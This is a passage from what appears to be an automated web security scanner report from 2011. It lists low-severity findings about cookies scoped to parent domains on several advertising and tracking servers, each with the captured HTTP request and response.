User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=4B88CCEA-94CF-AEFC-64AD-028BB2019E0D

Response

HTTP/1.1 302 Object moved
Date: Sun, 15 May 2011 20:26:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=6553221&linkid=&uid=134145602&rgid=1864&scid=0&ctid=0&crdr=http%3A%2F%2Fr%2Eturn%2Ecom%2Fr%2Fbeacon%3Fb2%3DFLmRqLwqYa5I0YQbvMbB3EJ08L1LAeFYPGApwxPekgtvzowi2ma1GoGp3jhwOQRSGl2V4RtfMhqgL9nzj79Usg%26cid%3D&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D134145602%26nICnt%3D1%26nDCnt%3D2%26nRGID%3D1864%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D98285%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D11302%5F11303%26nRID%3D0%26sRnd%3DB5FFQhb0
Content-Length: 667
Content-Type: image/gif
Expires: Sun, 15 May 2011 20:25:46 GMT
Set-Cookie: sessionstamp=1186043; expires=Sun, 15-May-2011 21:26:46 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=4B88CCEA%2D94CF%2DAEFC%2D64AD%2D028BB2019E0D; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDACQQQDBC=ELFBMOGDELENLLHOEJICPPEM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=6553221&linkid=&uid=134145602&rg
...[SNIP]...

15.3. http://ttwbs.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ttwbs.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sessionstamp=1186043;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 21:26:55 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?eid=203&oid=6553221&linkid=&uid=134145602&rgid=1864&scid=0&ctid=0&crdr=http%3A%2F%2Fr%2Eturn%2Ecom%2Fr%2Fbeacon%3Fb2%3DFLmRqLwqYa5I0YQbvMbB3EJ08L1LAeFYPGApwxPekgtvzowi2ma1GoGp3jhwOQRSGl2V4RtfMhqgL9nzj79Usg%26cid%3D&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D134145602%26nICnt%3D1%26nDCnt%3D2%26nRGID%3D1864%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D98285%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D11302%5F11303%26nRID%3D0%26sRnd%3DB5FFQhb0 HTTP/1.1
Host: ttwbs.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://sony.links.channelintelligence.com/pages/prices.asp?nrgid=1864&ssku=98285
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionstamp=1186043; serverstamp=4B88CCEA%2D94CF%2DAEFC%2D64AD%2D028BB2019E0D

Response

HTTP/1.1 302 Found
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=1186043;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 21:26:55 GMT
Cache-Control: private
Location: http://r.turn.com/r/beacon?b2=FLmRqLwqYa5I0YQbvMbB3EJ08L1LAeFYPGApwxPekgtvzowi2ma1GoGp3jhwOQRSGl2V4RtfMhqgL9nzj79Usg&cid=
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0

15.4. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.popularmedia.net
Path:	/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_ia_sess_1=bc86b4dc7729ba92915c2b8dd448c7a7; domain=.popularmedia.net; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widget/2be74c3e1d1bba1022bc80b0b5e0e0a5?redirectUser=false&openPanelOnLoad=false&skipIntroPanel=false HTTP/1.1
Host: www.popularmedia.net
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:40:28 GMT
Server: Mongrel 1.1.5
Status: 200
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Runtime: 24
Pragma: no-cache
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/javascript; charset=utf-8
Expires: 0
Set-Cookie: _ia_sess_1=bc86b4dc7729ba92915c2b8dd448c7a7; domain=.popularmedia.net; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 47368

(function() {
/*
var head = document.getElementsByTagName('head').item(0);
var script = document.createElement('script');
script.src = "http://platform.twitter.com/anywhere.js?id=&v=1";
scri
...[SNIP]...

15.5. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=amnufry4Zaw4nA9MAJUn8HsyIZbs5xMakDHiWt3ZavEhW6TLUwKvSTU5dNOf7Tjig6vTvXsrZdEJ71ZdZdnTrWMiyHS7ZayZdhWacXvp7Yw8e4vj; path=/; domain=.tribalfusion.com; expires=Sat, 13-Aug-2011 21:30:57 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=pastebincom&adSpace=ros&tagKey=3584356838&th=20169515204&tKey=undefined&size=728x90&p=14985803&a=2&flashVer=0&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fpastebin.com%2Ftrends&f=0&rnd=14999302 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: ANON_ID=a5nu7qsjyDsATFM6F3NBZcS4jjwxe3ZbKpdowGBVqckWcPtlThJpRtWlWZbQOW4AoEgPOr9YR9KnlgIuvuWU2mVk8RFrNMI6sVaj7ZdXiTsf

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=amnufry4Zaw4nA9MAJUn8HsyIZbs5xMakDHiWt3ZavEhW6TLUwKvSTU5dNOf7Tjig6vTvXsrZdEJ71ZdZdnTrWMiyHS7ZayZdhWacXvp7Yw8e4vj; path=/; domain=.tribalfusion.com; expires=Sat, 13-Aug-2011 21:30:57 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 2150
Expires: 0
Connection: keep-alive

document.write('<script language=\'javascript\'>\n//Required variables.\n var tf_clickTag = \'http://a.tribalfusion.com/h.click/aLmOnISTQFSV7IQresRd7bVGjP4bmrodiqXayv2WbFSsvH5AQHpdaoUtZb6XbfcXUFkXqaM
...[SNIP]...

15.6. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1628 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02eh00083r070l07508; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000023r020d6hll8nk2000000073r070dlzll9l28000000033r0315ztll9l28000000033r0301hvll8nk2000000073r0716iell9m03000000023r0201g3ll8nk2000000073r070msvll9m03000000023r020e6mll9m03000000023r02; sglst=2050s90ill9m030003j0023r020l02502dlell9l28000000033r030l035035msll9l28000000033r030l03503c24ll9l28000000033r030l035031jzll8nk200yjk0073r070l07507; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:43:18 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:43:17 GMT

GIF89a.............!.......,...........D..;

15.7. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
adImpCount=z8H5DIFkJMaR8Ed5F-227NZjh3y-rcMW04k_wbW9O0UpagDPKKctVczI9DEFcEkP4SDJo80wBimsrZzphev9io1NrxolS3YNP6BCNWbNMKERTUDkfjOHZfLNt9GGTnw4O5DlS8Xp0DD0cZiQf18CU1rocxY7nE-F4z9lkwlZYJmyKyuZekSrBs8bFOGeiOzayOqtjqJUs1trCEbZqAdtWw; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
fc=VBzn51JQz0zltCfNSC7f2diNYkWtlxDZmnwtgj7m71awBKgjtjPFRrKyS70pSqF5M1teNC2VYwZFniwNP2T0Fr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
pf=_ueUnCc1-Qecqj3JV1mSQXt8U7koKOu226ju1sLmLj8NE6qDfV8NEBcnTK27A9VWCoQ27uEq-jG8qUjaqeGSQcTUowLuhfuR4YEKOy3c8ZHFvEIZFcaT9sTwHmEL6Z6P6fmPZnJfwJhzzO6E35ZJTCuxdvuaAUa6ZYmQOOWX4Ivvjejc8x_DoS2zqjDa34YxxYOzH-FsCNNOyyJfH-npNT1r1jk-eJ1M0AYv01y1P5pSsnil0SgAGJf16SQF0ZiST-FpBVOv8U8Yc4TghjCD5heht3ivBnz3hwow8XaUE6U; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=26005388&ahcid=1176968&bimpd=vdZkVJM3QxaI71kKLmsceZdJ9RnFRApAjFc4UA5mG135wdUoUiC5Q1HPXXJdmSbXZKPsp9v3PDJq4nug8RlPS8TBeaPUl7h5CbFMTJ3clnW2WwHfZiw5Ubg4AHeRFTeOqtqGkBUZ_niFSfOuLxHOYVCAueWAZTu0lF6s5dyMH0KZxrl8fFT7Zb-t61TjnLRccNlIsr9gAj5uikcAmMDdg6dE1iEB5xrt-7OPIK5R-kmPQnSmAIH4otq9UaLzNaUNKjjF0W52a_vcddgtoYB2koJqQPbg2fxY2ghlkXX7rkP3GbHcWHJECWDh_pSnr8guR6OmA-V7v7IuPvusR1pSU-oeTYzF-2jOW8WSMR0Sv-qQTUeGoA1YBjq4KIcVPzpVJ6XTb-XXauwv8fAsUcwB0bDGBOcxDF2t_Om_Sd5E6qgTATRwncXWhXpsADdzy7mL1_4OegRSAQFuCiaaREoZwrBvz00HpyKHzI3tnCJVYHCRKDpw3P6_Vokh7Wcml2N2oIvSlbN9XKd0jLLt0XzxROEraJvQxqR9-xgRqOyluanGcNnn58DS8r_TsOcdV0kx210k0C5Y4hCWwHITGP6mPNTbcfB2r9AC15SL679eJ0exb5p3kHJSsrGPw6fJ_W7SXLGKd1cbz5CFphcqTn_DY8XIOEE_VmOmyozgoopzImeIjgHkTlWhNjMob0WG4P_drzqs3D5yAyWgrnFqBRVyEMBBOZnjvxqJP_Xrgaah8EA7eJnwrpm54xvQ2eBZXdM0z3pEtsT7J70a3mE-vLqZNQ&acp=TdB-tgAFh0YK7CsSqBshPgJ9iYgmLGiFSFLeKQ&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7C15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7Cundefined%7Cundefined%7C15110; rv=1; uid=4325897289836481830

Response

15.8. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=1&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:49 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3211269308389544143&fpid=1&nu=n&t=
...[SNIP]...

15.9. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:22:39 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

15.10. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_c7op="MLuBMx5WwltEVdJC1pDHXxVVQRFSxZB5VVzGA0eXFxQcE0JTcx0dirKNGop7K60NupMwPoi6rdLtmydkXXg0gitVkUe26E7B1wipX+vyz/MUyAh64f3weMIrGKJFcvdFkw39C3qx4sWW1ypxTDJMNgU1KkS+jVgIJFENEgUuRn79xfSJ5fz/1O7RmfXJ0PqBwv3R+PX0sejgmfXtzqvv9PJAFXEFDxEUFWnexeyz4erZpdno4ovl6qXb5Nb8/bvF8+CBwvzSmcL3/fZb7PkyM0of0XMcQHFvuQkjzA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMd5U+nfxIYLl18ZFrLI+JK2N4xaINkOV/MW2kt17b/HYOWgNCOJdT/cRHL6SujQ/U1MkjbzS/9Xo8c/nkc7A9gYF1T138FFPd84qYXFdfW8OktqEMQqq6EH7oUZnHv+txHi3CtGdRYH/BJWE9KeR0JpoBVQbG0SkWeRDthOpMIUsAqButGokk4HUz6miBWWTHJwiKTP5AQBe/UFH2fD2Sdx1aOU+9/9PuE0K3y4WLrYt4a7uXOxhbeEc/Y7FrFLX2kKc3sz4tQg1PvLTtEmvAmNqsQ97GZyqs2jq4yo2btb91v76B/kBu9qxX3TKrWJ2Dg3LThsz2IvLzYT3YotatnKFpm551fsjZAvkRnN0s+fNhPDb5b9qOF64fWv1LX12U2D2WLccuIizc9h3cFUHFhXAKOFWIGsKrxhzoAYRKxtmawpu4UJXkEF0rQS7HRTuN4G7mnCfcrUoX/iS3soaj1D4ACHImZXhx2FT0bb4oQBPezZJQgrIG/xslWiup/hvjD62ZujFBoorZ4N/s5bxSRGjYLZuzVz16dw1RO4fO3vtsZNBiqqh+bDV0xTBqoLLq3zTfPzDmucnr9XFMYP4lEWzZhAtZOmsZdHVh0uckbPq56oRv0YSX3TqozJ6SdPhycfyPqiTofuk/3VRabYxNEdb6NELU4ALKcOMaCiEDCiaOafFmZ+ouCdp0E/6Y8C1Hn80iuHHJ0pFL/5z4+9ubUck+RCuPYqxQ5M0m5fPvaSjH9FJKeWm7Ue7nduSxHvpoyrDSROUIcJQPc8ieY24I7W3pRGeoJKvy5TgV2kcPDuOaS/IKHmHqNZKdXwzuZsD8tAL3A02fG3/n0JEbxXjitt8b69eKaXkVznUFqYSy2zV87"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rsi_segs_1000000=pUPNfcPG7hMUFmJSL/a6Tc2cVgtigl9iBC1EXVoovPAwnmKsOWQJ/ULPGqLC16G0T17iRicC5KARkwTsTN8ioePPguoJ741/DK1Cmzf3MeNCyP1GEAb//VXLu/54y0XW2Qc7M45GdUJiNdjHq/ZtHS6Ghn8KrCU4potT0MwJAi0TACPm038iu2F90zRFvW2tyQA=; 